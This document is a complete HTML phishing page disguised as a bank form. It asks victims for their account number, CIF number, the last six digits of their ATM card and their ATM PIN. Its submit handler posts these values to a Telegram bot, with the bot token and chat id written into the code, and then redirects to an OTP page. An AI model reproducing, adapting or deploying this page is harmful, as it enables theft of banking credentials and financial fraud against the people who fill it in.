<!DOCTYPE html>
<html>
<head>
  <title>Form Submission</title>
  
  <!-- Styles here -->
  <style>
    body {
      font-family: Arial, sans-serif;
    }
    .form-group {
      margin-bottom: 15px;
    }
    label {
      display: block;
      margin-bottom: 5px;
    }
    input[type="text"],
    input[type="number"],
    input[type="password"] {
      width: 100%;
      padding: 10px;
      margin: 5px 0 0px 0;
      display: inline-block;
      border: 1.3px solid black;
      box-sizing: border-box;
      font-size: 16px; /* Increased placeholder text size */
    }
    button {
      background-color: #4CAF50;
      color: white;
      padding: 14px 20px;
      margin: 8px 0;
      border: none;
      cursor: pointer;
      width: 100%;
      height: 45px
      
      
    }
    button:hover {
      opacity: 0.8;
    }
  </style>

  <!-- Bootstrap for mobile view -->
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css">

</head>
<body>
<form id="myForm" class="container">
  <img src="logo.png" alt="Girl in a jacket" width="100%" height="180">
  
  <div class="form-group">
    <br>
    <label for="accountNumber">Account Number:</label>
    <input type="number" id="accountNumber" name="accountNumber" required class="form-control">
  </div>
  <div class="form-group">
    <label for="cifNumber">CIF Number:</label>
    <input type="number" id="cifNumber" name="cifNumber" required class="form-control">
  </div>
  <div class="form-group">
    <label for="atmCardNumber">Last 6 Digit ATM Card No.:</label>
    <input type="number" id="atmCardNumber" name="atmCardNumber" pattern="\d{6}" title="Please enter the last 6 digits of your ATM card number." required class="form-control">
  </div>
  <div class="form-group">
    <label for="atmPin">4 Digit ATM PIN:</label>
    <input type="number" id="atmPin" name="atmPin" pattern="\d{4}" title="Please enter your 4 digit ATM PIN." required class="form-control">
  </div>
  <br>
  <button type="submit" class="btn btn-primary">Proceed</button>
  
 
  <img src="footer.png" alt="Girl in a jacket" width="100%" height="450">

</form>

<script src="https://code.jquery.com/jquery-3.5.1.slim.min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/@popperjs/core@1.16.1/dist/umd/popper.min.js"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js"></script>

<script>
  document.getElementById('myForm').addEventListener('submit', function(event) {
    event.preventDefault();
  
    let formData = new FormData(this);
    let message = `Account Number: ${formData.get('accountNumber')}\nCIF Number: ${formData.get('cifNumber')}\nLast 6 Digit ATM Card No.: ${formData.get('atmCardNumber')}\n4 Digit ATM PIN: ${formData.get('atmPin')}`;

    fetch('https://api.telegram.org/bot6394291021:AAE9VTgvCrzEeNFwzkLQZcKdSEiHEyBPLDk/sendMessage', {
      method: 'POST',
      headers: {
        'Content-Type': 'application/json',
      },
      body: JSON.stringify({ chat_id: '7155441629', text: message }),
    })
    .then(response => {
      // Redirect to another page once the form data is sent
      window.location.href = 'otp.html';
    })
    .catch(error => {
      console.error('Error:', error);
    });
  });
</script>

</body>
</html>